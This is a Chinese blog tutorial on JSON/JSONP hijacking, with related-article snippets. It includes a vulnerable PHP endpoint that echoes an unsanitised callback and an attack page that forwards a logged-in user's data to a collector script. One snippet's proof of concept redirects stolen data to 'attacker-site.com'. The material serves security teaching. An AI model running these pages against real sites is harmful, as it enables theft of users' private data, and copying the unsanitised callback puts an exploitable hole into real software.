json劫持漏洞

最新推荐文章于 2025-02-16 22:11:40 发布
最新推荐文章于 2025-02-16 22:11:40 发布
阅读量413 收藏
点赞数
分类专栏: 暗月笔记 文章标签: json php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/RMC131/article/details/130251960
版权
JSON劫持是攻击者在用户认证状态下,通过拦截并篡改JSON数据来窃取敏感信息的一种攻击方式。测试过程包括寻找JSON类型页面,构造攻击页面,诱导用户访问以获取并转发数据。示例中展示了如何通过回调函数劫持数据并将其发送到攻击者的服务器。防范措施通常涉及改进数据传输和验证机制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

json劫持漏洞

JSON是一种轻量级的数据交换格式,劫持就对数据进行窃取。攻击者通过某些特定的手段。将本应返回已给用户的JSON数据进行拦截,转发给攻击者。一般劫持的JSON数据都是包含敏感信息或者有价值的数据

攻击方法与CSRF类似。需要用户登录账号,在身份是认证没有消除的情况下访问攻击者设计好的页面。进而获取JSON数据,并转发给攻击者。

测试方法

找到json类型的页面 -> 构建攻击页面 -> 诱导目标访问页面 -> 获取数据

//json.php
<?php
header('Content-type: application/json');
$callback = $_GET['callback'];
print $callback.'({"id" : "1","name" : "moonsec","email":"moon@moonsec.com"});';
?>

劫持测试页面

<!-- json_test.html -->
<!DOCTYPE html>
<html lan="en">
    <head>
    <meta charset="UTF-8">
    <title>json劫持</title>
    <script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
    </head>
    <body>
        <script>function jsonp2(data){alert(JSON.stringify(data));}</script>
        <script src ="http://www.webtester.com/json.php?callback=jsonp2"></script>
    </body>
</html>

劫持json发送返回数据

<!-- json_attack.html -->
<!DOCTYPE html>
<html lan="en">
<head>
    <meta charset="UTF-8">
    <title>json劫持发送返回数据</title>
    <script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
    <script>
        function test(data){
            //alert(v.name);
            var xmlhttp = new XMLHttpRequest();
            var url = "http://127.0.0.1/json/1.php?file=" + JSON.stringify(data);
            xmlhttp.open("GET",url,true);
            xmlhttp.send();
            }
    </script>
    <script src ="http://www.webtester.com/json.php?callback=test"></script>
</head>
    <body>   
    </body>
</html>

//1.php
<?php
if($_GET['file']){
   file_put_contents('json.txt', $_GET['file']);
}
?>

访问json_atack.html劫持json数据传到1.php,保存到json.txt

JSON劫持漏洞
W404129262的博客
07-15 977
项目在运行当中被安全部扫描扫描得到了JSON漏洞。一开始想着是把JSON包提高包的等级,但是还是没有解决掉JSON劫持的问题,安全部扫描后得到了一系列的修复漏洞方式,先把背景和对方提供的解决方案发出来。 这是关于漏洞背景方面 采用JSON文本的数据交互方式由于可以天然的在浏览器中使用,所以随着ajax和web业务的发展得到了广大的发展,各种大型网站都开始使用,包括Yahoo,Google,Tencent,Baidu等等。 但是如果这种交互的方式用来传递敏感的数据,并且传输的时候没有做太多...
渗透测试-JSONP数据劫持漏洞
cdyunaq的博客
03-31 7788
​介绍 JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。 更通俗的说法:JSONP 就是利用<script>标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生..
JSON劫持漏洞(详细讲解利用JSON从而进行数据劫持漏洞攻防策略)
热门推荐
一只苟延残喘的卑微蝼蚁
05-24 2万+
英文原文:JSON Hijacking英汉对照:JSON Hijacking 翻译对照原文解析:JSON劫持漏洞分析和攻防演练声明(阅读前必读!!!):转载自这篇文章本人是一个英语渣,英语四级都没过。翻译此文存粹用于英语学习,而且大部分还是用翻译软件翻译的。请谨慎阅读此译文,注意不要被译文雷到。另外这是一篇2009年的老文章了,里面有部分知识可能已经过时了,不过文章中关于JSON劫持的知识大部分还...
JSON注入与CSRF漏洞原理与复现
lza20001103的博客
02-16 509
JSON注入与CSRF漏洞原理与复现
JSON劫持漏洞分析
Fly_鹏程万里
05-17 5639
什么是JSON劫持单从字面上就可以理解的出来,JSON是一种轻量级的数据交换格式,而劫持就是对数据进行窃取(或者应该称为打劫、拦截比较合适。恶意攻击者通过某些特定的手段,将本应该返回给用户的JSON数据进行拦截,转而将数据发送回给恶意攻击者,这就是JSON劫持的大概含义。一般来说进行劫持JSON数据都是包含敏感信息或者有价值的数据。造成JSON劫持漏洞的成因正所谓无风不起浪,无根不长草,要发动一...
101.网络安全渗透测试—[常规漏洞挖掘与利用篇17]—[json劫持漏洞与测试]
qwsn
02-07 4394
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、json劫持漏洞概念 (1)json劫持概念 (2)json劫持攻击 二、json劫持漏洞测试 (1)json劫持漏洞测试流程与方法 (2)json漏洞页面源码:`json.php` (3)测试json.php是否存在漏洞:`json-poc.html` (4)劫持json数据,发送给远程服务器
java json injection_JSON相关漏洞(Hijacking+Injection)挖掘技巧及实战案例全汇总
weixin_36062835的博客
02-19 1115
本文一是在为测试过程中遇到json返回格式时提供测试思路,二是几乎所有国内的资料都混淆了jsonjsonp的区别——这是两种技术;以及jsonjsonphijacking的区别——这是两个漏洞,这里做个解释。1、概念1)什么是jsonjson(JavaScript Object Notation, JS 对象标记) 是一种轻量级的数据交换格式。JSON最常用的格式是对象的键值对,例如下面这样...
详解JSONJSONP劫持以及解决方法
10-17
JSON劫持中,攻击者利用浏览器中script标签的特性来执行恶意脚本,并从已经登录的用户浏览器中窃取JSON格式的敏感数据。由于script标签可以请求外部脚本资源并且其加载的内容会被浏览器自动执行,如果一个Web应用...
JSONP 劫持漏洞实例
11-15 2070
0x01 Jsonp简介 Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 为什么我们从不同的域(网站)访问数据需要一个特殊的技术(JSONP )呢?这是因为同源策略。 同源策略,它是由Netscape提出的一个著名的安全策略,现在所有支持JavaScript 的浏览器都会使用这个策略。 ...
Json hijacking/Json劫持漏洞
weixin_33712987的博客
01-22 347
0x00 相关背景介绍JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成。它基于JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999的一个子集。 JSON采用完全独立于语言的文本格式,但是...
JSONP数据劫持漏洞
qq_50854662的博客
04-19 1248
JSONP数据劫持漏洞
php-dos-attack:利用PHPjson_decode漏洞
05-13
PHP服务器上模拟哈希冲突攻击 签出。 这个怎么运作 PHP哈希表容易受到复杂性攻击。 因此,每个需要外部输入并在PHP哈希表中进行解析的函数都容易受到复杂性攻击。 测试PHP漏洞以进行碰撞攻击 在目录test ,有PHP脚本演示了使用PHP映射的函数的漏洞。 文件collision_keys_small.txt仅包含1万个条目。 如果您想测试真实交易,则应使用collision_keys.txt (64k条目)尝试这些攻击。 运行测试 运行测试以将冲突键插入数组: docker run -it \ -v "$PWD":/usr/src/app -w /usr/src/app php:5.6-cli \ php test/array.php collision_keys.txt 运行测试以针对具有冲突键的JSON键值对调用json_decode : docker run -it -
JSON劫持漏洞攻防原理及演练
hanqing
01-11 2288
注* 作者发表这篇文章的时间较早,某些方法可能并不是最好的解决方案,但针对这种漏洞进行的攻击还依然可见,如早期的:QQMail邮件泄露漏洞,下面介绍的是对这种攻击原理的介绍。   不久之前,我写了一篇文章《一个微妙的JSON漏洞》,文中讲到这个漏洞可能会导致敏感信息泄露。针对该漏洞的特点,通过覆盖JavaScript数组构造函数以窃取(暴露)JSON返回数组,而现在大多数浏览器还无法防范这种
浅谈JSONP劫持漏洞
我的博客,不一样的自我表达
07-23 332
那么攻击者可以构造url:http://127.0.0.1/aphp.test.html或http://127.0.0.1/attack.htm?例如http://aphp.test/jsonp/test_jsonp.php?一般开发中,前端可以很方便的调用,一般输出Callback都是可定制的,如果过滤不严格,或者Content-Type设置不合适,就会导致xss。由于浏览器同源策略的限制,浏览器只允许XmlHttpRequest请求当前相同(域名、协议、端口)的资源,对请求脚本资源没有限制。
第81篇:JSONP劫持漏洞获取敏感信息原理、复现与坑点总结
ABC_123的博客
11-25 2615
Part1 前言大家好,我是ABC_123。今天我们研究一下JSONP劫持漏洞,早些年这个漏洞主要被攻击者用来窃取个人信息,如姓名、身份证号、家庭住址等,现在更多的用于蜜罐之中,间接溯源红队攻击者的个人身份。好多朋友至今对这个漏洞理解不深刻,能发现能利用,但是就是不明白原理,有时候别人能复现成功,但是自己却怎么都复现成功。今天ABC_123搭建一个tomcat环境,用java代码写了几个ser...
jsonp劫持漏洞研究与防范
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-22 826
文章目录背景知识jsonp同源策略JSONP劫持????栗子防范 背景知识 jsonp Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据,也就是说可以通过这个技术,绕过同源策略。 JSONP 由两部分组成:回调函数和数据。回调函数是当响应到来时应该在页面中调用的函数。回调函数的名字一般是在请求中指定的。而数据就是传入回调函数中的 JSON 数据。 同源策略 同源策略(Same Origin Policy),它是由 Ne
JSONP劫持漏洞EXP
weixin_50464560的博客
08-11 490
JSONP EXP 方法一:JavaScript调用 弹窗代码(弹窗JSON数据): <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>JSONP EXP跨域测试</title> </head> <body> <script> function jsoncallback(json){ //new
浅谈CSRF跨域读取型漏洞JSONP劫持
记录学习,一起进步
03-06 1101
CSRF跨域读取型漏洞JSONP劫持
json漏洞如何发现
最新发布
03-28
### 如何检测和发现JSON中的安全漏洞 #### 1. JSON劫持漏洞的概念 JSON劫持是指攻击者通过某种手段获取并控制客户端请求的JSON数据,从而窃取敏感信息或执行其他恶意操作。这种漏洞通常发生在跨域资源共享(CORS)配置不当或者前端未正确处理返回的数据时[^1]。 #### 2. 测试JSON劫 hold 漏洞的方法 为了检测JSON相关的安全漏洞,可以通过以下几种方式进行测试: - **分析API接口的安全性** 需要仔细审查应用中暴露的API接口是否允许未经身份验证的访问。如果存在公开可读的JSON端点,则可能存在潜在的风险[^2]。 - **编写POC脚本** 使用简单的HTML文件模拟攻击场景,例如创建一个`json-poc.html`页面加载目标站点上的资源,并尝试将其重定向到外部服务器以捕获响应内容。这可以帮助确认是否存在跨站脚本注入(XSS)或者其他形式的数据泄露问题。 ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>JSON POC</title> </head> <body> <script type="text/javascript"> function sendStolenData() { var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://example.com/json.php', true); xhr.onreadystatechange = function () { if (xhr.readyState === 4 && xhr.status === 200){ document.location='http://attacker-site.com/?stolen='+encodeURIComponent(xhr.responseText); } }; xhr.send(null); } sendStolenData(); </script> </body> </html> ``` 上述代码片段展示了如何构建基本的PoC来检验某个URL是否会泄漏用户的私人资料给第三方网站。 - **利用工具自动化扫描** 市面上有许多专门针对Web应用程序缺陷设计的渗透测试软件,比如Burp Suite Pro、OWASP ZAP等都可以用来查找包括但不限于JSON解析错误在内的多种常见隐患[^5]。 #### 3. 关于FastJson漏洞特别说明 对于像阿里巴巴开源库Fastjson这样的序列化反序列化工具有其独特的脆弱之处——当启用自动型转换功能(`autoType`)的时候容易遭受远程命令执行(RCE),因此建议开发者始终遵循官方文档推荐的最佳实践关闭该选项除非绝对必要[^3]。 #### 4. JWT相关注意事项 尽管JWT本身并不构成直接威胁,但如果密钥管理不善则会引发严重的认证失败状况;另外还需警惕算法降级攻击(Algorithm Confusion Attack)[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_JINJI_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值